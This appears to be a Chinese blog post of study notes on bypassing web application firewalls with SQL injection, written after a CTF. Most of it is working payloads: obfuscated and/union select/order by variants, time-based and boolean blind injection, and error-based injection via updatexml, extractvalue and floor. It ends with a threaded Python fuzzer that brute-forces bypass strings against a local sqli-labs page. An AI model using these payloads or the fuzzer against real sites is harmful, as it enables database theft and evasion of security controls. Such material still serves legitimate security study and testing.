
    技术2025-02-09  16

    因为对上次比赛sql的题挺不甘心 所以又着重复习了一遍sql,并记录了平常绕waf的点

    手工bypass要点 先通过破坏关键字测试出拦截规则 之后进行针对性绕过



    0x01 and绕过

    直接 and 1=1 直接就会被拦截 在数值的前面加特殊符号干扰匹配规则进行绕过 在这里使用取反符号’-‘或者取逻辑位非运算符号’~'进行绕过 and = && or = || %26 == &

    0x02 对order by ——> 判断表的字段数绕过

    通过破坏关键字测试出拦截的是 order by 这两个关键字的组合,单独的关键字不拦我们只需要干扰他的匹配即可。 在这里我测试使用的是内联注释和中间加特殊字符进行绕过

    /*!order*/ by 3 order%0aby 4

    0x03 union select 联合注入绕过

    这两个也是单独一个不拦 组合起来就会触发拦截 这里给出几个绕过payload union select 绕过

    ' union/*!50000select*/1,2,3--+ ' union--+%0aselect 1,2,3--+ ' union%23%0a+all+select+1,2,3--+ '/*union select 1,2,3--+*/ '+"/*"union select 1,2,3"*/"--+ '+'/*'union select 1,2,3%23*/--+

    database() 函数+编码绕过

    hex(database%0a()) hex(database/**/())

    0x01 时间盲注


    ' and if((substr((select user()),1,1)>'a'),sleep(2),1)--+ select user()处可以替换成要执行的查询语句 如:select group_concat(table_name,0x7e) from information_schema.tables where table_schema = database() payload 1、内联注释绕过

    '/*!50000and*/if((substr((select hex(user/**/())),1,1)>1),sleep/**/(2),1)--+

    2、and后面可以接特殊的字符可以绕过包括不限于! ~ & -

    加偶数个’~’,可以绕过 加奇数个’-‘可以绕过’ 加3/4/5数个’!'绕过

    ' and ~if((substr((select hex(user/**/())),1,1)>1),sleep/**/(2),1)--+ ' and !!!if((substr((select hex(user/**/())),1,1)>1),sleep/**/(2),1)--+ ' and ---if((substr((select hex(user/**/())),1,1)>1),sleep/**/(2),1)--+

    0x02 布尔盲注


    and substr((select database()),1,1)='s'--+ ' and length(database())>7--+

    payload 1、内联注释直接绕过 '/*!50000and*/ substr((select hex(database/**/())),1,1)>1 2、在substr函数前面加特殊符号绕过 加偶数个’~’,可以绕过 加 3 4 7 8 等数个’!'绕过 爆表 ' and~~hex(substr((select table_name /*!50000from*/ information_schema.tables where table_schema=database/**/() limit 1,1),1,1))>60--+


    报错注入常用的一些函数 1、floor() select * from security.users where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a); 2、extractvalue() select * from security.users where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e))); 3、updatexml() select * from security.users where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1)); 绕过payload


    /*!%26%26*/ /*!11440updatexml*/(1,concat(0x7e,(select unhex(hex(user/**/()))),0x7e),1) /*!50000and*/ /*!11440updatexml*/(1,concat(0x7e,(select unhex(hex(user/**/()))),0x7e),1)

    2、特殊连接符绕过 任意数个’~‘符号绕过 奇数个’-'绕过

    and-/*!50000updatexml*/(1,concat(0x7e,(select unhex(hex(user/**/()))),0x7e),1) and~/*!50000updatexml*/(1,concat(0x7e,(select unhex(hex(user/**/()))),0x7e),1) and `updatexml`(1,concat(0x7e,(select unhex(hex(user/**/()))),0x7e),1)


    fuzz script
    import requests from queue import Queue import threading fuzz_zs = ['/*', '*/', '/*!', '*', '=', '`', '!', '@', '%', '.', '-', '+', '|', '%00'] fuzz_sz = ['', ' '] fuzz_ch = ["%0a", "%0b", "%0c", "%0d", "%0e", "%0f", "%0g", "%0h", "%0i", "%0j"] fuzz = fuzz_ch + fuzz_sz + fuzz_zs class Fuzz: def __init__(self, base_url, thread_num): self.base_url = base_url self.thread_num = thread_num self.headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)' ' Chrome/74.0.3729.169 Safari/537.36'} self.task = Queue() for a in fuzz: for b in fuzz: for c in fuzz: for d in fuzz: exp = self.base_url + "'+\"/*\"union" + a + b + c + d + "select 1,2,3%23*/" self.task.put(exp) def visit(self, exp_url): try: resp = requests.get(exp_url, headers=self.headers) resp_text = resp.text except requests.ConnectionError: resp_text = "" return resp_text def test_url(self): with open('fuzz_url.txt', 'w+') as f: while not self.task.empty(): exp_url = self.task.get() resp_text = self.visit(exp_url) if "Welcome" in resp_text and "error" not in resp_text: f.write(exp_url + '\n') print(exp_url) def work(self): threads = [] for i in range(self.thread_num): t = threading.Thread(target=self.test_url()) threads.append(t) t.start() for t in threads: t.join() url = "http://localhost/sql/Less-1/?id=1" obj = Fuzz(url, 10) obj.work()

      参考文章   GOT IT! 更多绕waf需通过实践去探索


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